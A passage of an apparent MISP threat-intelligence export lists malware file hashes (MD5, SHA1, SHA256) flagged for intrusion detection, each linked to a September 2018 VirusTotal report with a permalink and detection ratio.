"category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334462", "to_ids": false, "type": "text", "uuid": "6f915503-6a42-4a44-8ba4-a563bb038e7d", "value": "9/53" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334465", "uuid": "d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "ObjectReference": [ { "comment": "", "object_uuid": "d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "referenced_uuid": "6836f38c-a2eb-4f7c-9055-2ffb96e7c45e", "relationship_type": "analysed-with", "timestamp": "1537334494", "uuid": "5ba1dcde-a0e8-4072-ba50-44f202de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334462", "to_ids": true, "type": "md5", "uuid": "8de70b34-70b1-43f2-b3f7-fed0a57ab773", "value": "1de7ceb3434243aa94296393165f89e7" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334462", "to_ids": true, "type": "sha1", "uuid": "5db4126d-0436-41b2-96a9-525e9924f1db", "value": "67a12afbe6751418141284716235a6b27c17443a" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334462", "to_ids": true, "type": "sha256", "uuid": "a64377f4-b5b5-4ecf-b760-4970341efe1a", "value": "725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334463", "uuid": 
"6836f38c-a2eb-4f7c-9055-2ffb96e7c45e", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334463", "to_ids": false, "type": "datetime", "uuid": "a7862599-832b-4ba2-ab1c-b1a320c1a4ad", "value": "2018-09-19T03:31:22" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334463", "to_ids": false, "type": "link", "uuid": "abcf84f8-0717-443f-b190-4c623df3933d", "value": "https://www.virustotal.com/file/725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054/analysis/1537327882/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334464", "to_ids": false, "type": "text", "uuid": "c306e374-13a0-4f9e-956c-e55fe50a8c97", "value": "26/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334467", "uuid": "edd4b990-82be-4e5e-858f-50bbd7222f03", "ObjectReference": [ { "comment": "", "object_uuid": "edd4b990-82be-4e5e-858f-50bbd7222f03", "referenced_uuid": "54646fe4-9b9d-470a-9042-d446a90a15a5", "relationship_type": "analysed-with", "timestamp": "1537334494", "uuid": "5ba1dcde-f6d4-4fea-9dcb-421402de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334464", "to_ids": true, "type": "md5", "uuid": "0de582fd-db8e-43c5-abb2-93b0214dcc6f", "value": "f8c7e23c71478aa99dc3627da989b2ca" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334464", "to_ids": true, "type": "sha1", 
"uuid": "f017cfec-9858-4d88-b9e0-ff9a6383f57e", "value": "e41d26b124c21b2c82b77194ed6be6ee8281410a" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334465", "to_ids": true, "type": "sha256", "uuid": "bbb8d985-2be4-4fa1-8524-8acb92ab0616", "value": "dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334465", "uuid": "54646fe4-9b9d-470a-9042-d446a90a15a5", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334465", "to_ids": false, "type": "datetime", "uuid": "f8ac3222-2b8a-49c6-b107-f22538e9f3f9", "value": "2018-09-18T20:07:10" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334466", "to_ids": false, "type": "link", "uuid": "193bbd5f-b6bd-43bc-b1f7-f75586c795ad", "value": "https://www.virustotal.com/file/dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54/analysis/1537301230/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334466", "to_ids": false, "type": "text", "uuid": "2240f3fb-744f-48a4-8918-f9c428c4d465", "value": "10/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334469", "uuid": "33e723b8-2142-46a4-8eae-c311211ea8a0", "ObjectReference": [ { "comment": "", "object_uuid": 
"33e723b8-2142-46a4-8eae-c311211ea8a0", "referenced_uuid": "87558dd2-f70c-49b7-b710-6666909e0e91", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-6b5c-447b-b617-489c02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334466", "to_ids": true, "type": "md5", "uuid": "df8f7068-ffca-4885-bac9-8c007b52827d", "value": "9d080aa27da74e146a45b56c86476f20" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334467", "to_ids": true, "type": "sha1", "uuid": "ca26330b-73f7-4055-9840-8c65b17290d3", "value": "115bda02fd2807bd0e9645656c378bf1b145b4b8" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334467", "to_ids": true, "type": "sha256", "uuid": "47a1b89f-0b1b-486d-8121-6e17019f64de", "value": "dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334468", "uuid": "87558dd2-f70c-49b7-b710-6666909e0e91", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334468", "to_ids": false, "type": "datetime", "uuid": "3d949d3f-cbed-49eb-b6d4-76efa21d3605", "value": "2018-09-18T11:41:09" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334468", "to_ids": false, "type": "link", "uuid": "120a5e8e-d241-45d1-a52a-b20a69c69c21", "value": 
"https://www.virustotal.com/file/dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff/analysis/1537270869/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334469", "to_ids": false, "type": "text", "uuid": "6522271c-6206-43b8-bed9-2ee6b928da31", "value": "21/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334472", "uuid": "d88b602b-394b-4c46-92fd-b776ed9ef8d9", "ObjectReference": [ { "comment": "", "object_uuid": "d88b602b-394b-4c46-92fd-b776ed9ef8d9", "referenced_uuid": "3df3df12-3458-48cc-9031-686fefeaf564", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-8064-4ae5-912f-446a02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334469", "to_ids": true, "type": "md5", "uuid": "de4b1ff0-8efa-46f4-b618-be604c2eeedc", "value": "2d39b1792b263eba084e10c54e053d84" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334469", "to_ids": true, "type": "sha1", "uuid": "83e0e2db-e2ee-46f6-bb21-a2494c055af2", "value": "1468eac59bd43901de82389276bded18202f799f" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334469", "to_ids": true, "type": "sha256", "uuid": "73f9847b-1485-4c7d-ad01-12b9003b1e97", "value": "f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": 
"d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334470", "uuid": "3df3df12-3458-48cc-9031-686fefeaf564", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334470", "to_ids": false, "type": "datetime", "uuid": "9c2f0268-084d-401f-a118-859baa7da926", "value": "2018-09-18T18:34:30" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334470", "to_ids": false, "type": "link", "uuid": "92b34d76-149f-4fab-a1c0-3d1fab052d39", "value": "https://www.virustotal.com/file/f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc/analysis/1537295670/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334471", "to_ids": false, "type": "text", "uuid": "7c1e81fd-a762-4c8c-910f-e10d7da374bd", "value": "15/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334474", "uuid": "93747f03-1eec-47e4-82bc-29b8356a4961", "ObjectReference": [ { "comment": "", "object_uuid": "93747f03-1eec-47e4-82bc-29b8356a4961", "referenced_uuid": "59d3e161-919f-486a-bb7b-f4010360c91c", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-2b20-43ad-bd13-4bfb02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334471", "to_ids": true, "type": "md5", "uuid": "1fc95f86-1389-4c09-b65f-fca093d04a4e", "value": "7b5008d312465307905d96b4b8366326" }, { "category": "Payload delivery", "comment": "", "deleted": false, 
"disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334471", "to_ids": true, "type": "sha1", "uuid": "e26b042f-7e21-411e-b30e-7412ae4f3f6d", "value": "a0a5d9fc4ce11f9069a64229cef52ba707027546" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334472", "to_ids": true, "type": "sha256", "uuid": "7531c1a3-4476-4afe-b6b0-3de9bad07f28", "value": "0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334472", "uuid": "59d3e161-919f-486a-bb7b-f4010360c91c", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334472", "to_ids": false, "type": "datetime", "uuid": "344f34ab-206c-4ca6-857f-f038049eeca8", "value": "2018-09-19T05:11:59" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334473", "to_ids": false, "type": "link", "uuid": "b42f45b5-2c58-4b38-a615-c6c66fd48dcb", "value": "https://www.virustotal.com/file/0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641/analysis/1537333919/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334473", "to_ids": false, "type": "text", "uuid": "647a2027-5c6b-4ee2-a934-fe17edc10ae7", "value": "10/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334476", "uuid": 
"a1f90b96-d2ce-46d4-a059-5efedbb57e07", "ObjectReference": [ { "comment": "", "object_uuid": "a1f90b96-d2ce-46d4-a059-5efedbb57e07", "referenced_uuid": "7b042050-b92e-404c-87e8-107c8986e1d7", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-1b58-4bee-bdfe-4cb202de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334473", "to_ids": true, "type": "md5", "uuid": "003bead2-ae33-4055-955d-7b48b37dda5a", "value": "e158c98a90cc7b14d026443cbcd8b520" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334474", "to_ids": true, "type": "sha1", "uuid": "2002d015-fc25-4712-a460-31be8ac249d5", "value": "0c00df2bee83f9f7c6f2be3d9dd7557e9410a579" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334474", "to_ids": true, "type": "sha256", "uuid": "b8ea3d0d-7f07-477d-91f4-0841aa2c5415", "value": "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334475", "uuid": "7b042050-b92e-404c-87e8-107c8986e1d7", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334475", "to_ids": false, "type": "datetime", "uuid": "3eecf2ce-db49-433d-8296-a664cf52841e", "value": "2018-09-18T18:31:13" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334475", "to_ids": false, "type": "link", "uuid": 
"5e7593ee-fbb7-411a-8578-ed90875953e3", "value": "https://www.virustotal.com/file/a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af/analysis/1537295473/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334476", "to_ids": false, "type": "text", "uuid": "585e2605-9a59-4405-b604-1d36a87903e8", "value": "14/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334479", "uuid": "45a9a837-c3c8-436c-a546-30547955ba2c", "ObjectReference": [ { "comment": "", "object_uuid": "45a9a837-c3c8-436c-a546-30547955ba2c", "referenced_uuid": "6beca7d0-c2fe-4742-b58a-014a7f542862", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-8ef4-4e0d-9331-48aa02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334476", "to_ids": true, "type": "md5", "uuid": "09127372-1658-4d8d-8929-4204b7bf853e", "value": "3b5baecd61190e12a526c51d5ecccbbe" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334476", "to_ids": true, "type": "sha1", "uuid": "7968de2f-7e78-42eb-b3c9-9ab750d78126", "value": "422288eb6941cee899c1046ccfcd94681b36230a" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334476", "to_ids": true, "type": "sha256", "uuid": "3c277d27-491b-4a6c-84ce-047679ff94c6", "value": "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": 
"virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334477", "uuid": "6beca7d0-c2fe-4742-b58a-014a7f542862", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334477", "to_ids": false, "type": "datetime", "uuid": "f817657f-fa64-46b2-83d0-5baddd55e755", "value": "2018-09-19T03:31:11" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334477", "to_ids": false, "type": "link", "uuid": "8e6ad2e0-623d-4a80-a8d1-9fd46979f486", "value": "https://www.virustotal.com/file/f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8/analysis/1537327871/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334478", "to_ids": false, "type": "text", "uuid": "1605e2ae-c2cb-4ec7-83b8-eae5be80768c", "value": "10/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334481", "uuid": "d3df327a-fc5e-422f-a7a1-56849a91787a", "ObjectReference": [ { "comment": "", "object_uuid": "d3df327a-fc5e-422f-a7a1-56849a91787a", "referenced_uuid": "84cc3152-b806-4ef9-a3c4-e96e0b39f86d", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-7b44-4e87-838e-45f102de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334478", "to_ids": true, "type": "md5", "uuid": "0b9ba36b-0d3d-4642-adb9-ba2f8b1c850d", "value": "50ab7c696ca74e8ae322855d445e0613" }, { "category": "Payload delivery", "comment": 
"", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334478", "to_ids": true, "type": "sha1", "uuid": "b95ecbe5-d8f1-41ae-bad5-7fd612043512", "value": "b8b0226fb4f945b68d222c62ebb02f00874f379c" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334479", "to_ids": true, "type": "sha256", "uuid": "f10461c6-66bc-4d98-b53c-3d14d707e994", "value": "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334479", "uuid": "84cc3152-b806-4ef9-a3c4-e96e0b39f86d", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334479", "to_ids": false, "type": "datetime", "uuid": "9229de7c-a78d-4c5e-9a03-a80669988b10", "value": "2018-09-18T10:58:17" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334480", "to_ids": false, "type": "link", "uuid": "69b5bea2-6731-4815-a928-fee550c759e4", "value": "https://www.virustotal.com/file/de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d/analysis/1537268297/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334480", "to_ids": false, "type": "text", "uuid": "e36c477b-83aa-479a-ab23-212692965f2e", "value": "20/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": 
"1537334483", "uuid": "14197298-00cc-4d59-85a6-5cf1be917b5c", "ObjectReference": [ { "comment": "", "object_uuid": "14197298-00cc-4d59-85a6-5cf1be917b5c", "referenced_uuid": "e3c55821-3317-4be2-8eef-60d480f1737e", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-3544-4163-a91e-414702de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334480", "to_ids": true, "type": "md5", "uuid": "0d280e5b-9777-458c-8363-5c361771d178", "value": "56303f9c9b3ec89f4a883a4d7b079f65" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334481", "to_ids": true, "type": "sha1", "uuid": "4eb9bc65-7f44-474f-8e85-9c5b3482384b", "value": "4f0d4dc8cf49e2deff34e00e362bbc81dbef1f8d" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334481", "to_ids": true, "type": "sha256", "uuid": "2f3fdf32-d834-4fbc-a166-a671350aa962", "value": "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334482", "uuid": "e3c55821-3317-4be2-8eef-60d480f1737e", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334482", "to_ids": false, "type": "datetime", "uuid": "e412a478-b0ac-46aa-af48-a19eb9484d6e", "value": "2018-09-19T05:10:00" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334482", "to_ids": false, "type": "link", "uuid": 
"7149939a-1c5a-4b67-8ae0-edd23d9c4473", "value": "https://www.virustotal.com/file/7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa/analysis/1537333800/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334482", "to_ids": false, "type": "text", "uuid": "c5156a8e-63da-4dca-af17-fe34c7991169", "value": "12/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334485", "uuid": "03ebd023-1b57-415f-8a97-f37f6b1095ba", "ObjectReference": [ { "comment": "", "object_uuid": "03ebd023-1b57-415f-8a97-f37f6b1095ba", "referenced_uuid": "8755454f-61de-4423-a149-1d7ba841b7c3", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-1844-4820-8a9e-4eba02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334483", "to_ids": true, "type": "md5", "uuid": "21b1e49a-ae72-4d64-8ba4-4cea48439229", "value": "55142f1d393c5ba7405239f232a6c059" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334483", "to_ids": true, "type": "sha1", "uuid": "2b7367c9-9efe-4928-af5a-f472cb3dfea7", "value": "effa37b97174802f17f3c75f25928226b7cd80ba" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334483", "to_ids": true, "type": "sha256", "uuid": "b186fbaa-5433-4853-a899-22e268e6c9ea", "value": "e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": 
"virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334484", "uuid": "8755454f-61de-4423-a149-1d7ba841b7c3", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334484", "to_ids": false, "type": "datetime", "uuid": "d289e539-f5be-4002-9ae9-d3bf3a0c4b6c", "value": "2018-09-18T18:37:52" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334484", "to_ids": false, "type": "link", "uuid": "9f4ff50c-787c-4ffe-bde1-c802d2f1a658", "value": "https://www.virustotal.com/file/e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c/analysis/1537295872/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334485", "to_ids": false, "type": "text", "uuid": "433d9d46-b96e-4c76-9134-de36185263bb", "value": "11/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334488", "uuid": "0fea2aef-bf8b-40d9-a152-3ef21cef0096", "ObjectReference": [ { "comment": "", "object_uuid": "0fea2aef-bf8b-40d9-a152-3ef21cef0096", "referenced_uuid": "c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-5630-47c2-92cc-4bec02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334485", "to_ids": true, "type": "md5", "uuid": "281548ff-e16e-48e9-8871-7c4223471f70", "value": "601080e36cd6a757684e0996afd9a0e6" }, { "category": "Payload delivery", "comment": 
"", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334485", "to_ids": true, "type": "sha1", "uuid": "5fa5ddcc-2902-43d2-8af3-6cf2e29c219f", "value": "e818a9a229d93e6bfe0285c8a155dcaceb03b03d" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334486", "to_ids": true, "type": "sha256", "uuid": "efddf544-121e-4c33-b6c7-1e43bf310896", "value": "d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334486", "uuid": "c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334486", "to_ids": false, "type": "datetime", "uuid": "f49f7c54-6abf-441e-af78-252779b3999b", "value": "2018-09-19T03:31:25" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334487", "to_ids": false, "type": "link", "uuid": "4fdb1fd9-d5e9-4521-818f-912d41c677bd", "value": "https://www.virustotal.com/file/d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6/analysis/1537327885/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334487", "to_ids": false, "type": "text", "uuid": "e8a2ade3-e01e-4b65-ad3c-87d11345213f", "value": "2/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": 
"1537334490", "uuid": "faeff86b-7e43-4c04-b688-b6be1f62faaa", "ObjectReference": [ { "comment": "", "object_uuid": "faeff86b-7e43-4c04-b688-b6be1f62faaa", "referenced_uuid": "ebb05fd0-b56c-4384-bde9-b8e540af4c63", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-40fc-42d1-ac20-48e802de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334487", "to_ids": true, "type": "md5", "uuid": "891b54a8-ad73-46fc-a21e-cf1f39eae44b", "value": "3a3ae909caee915af927c29a6025d16c" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334488", "to_ids": true, "type": "sha1", "uuid": "68492a5d-8e23-45f7-8beb-f2f7993c0be9", "value": "81e7207f502229769d2d7979f88235261053c24b" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334488", "to_ids": true, "type": "sha256", "uuid": "19113d7d-f40f-45b2-aa8d-5acb77a6d38a", "value": "31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78" } ] }, { "comment": "", "deleted": false, "description": 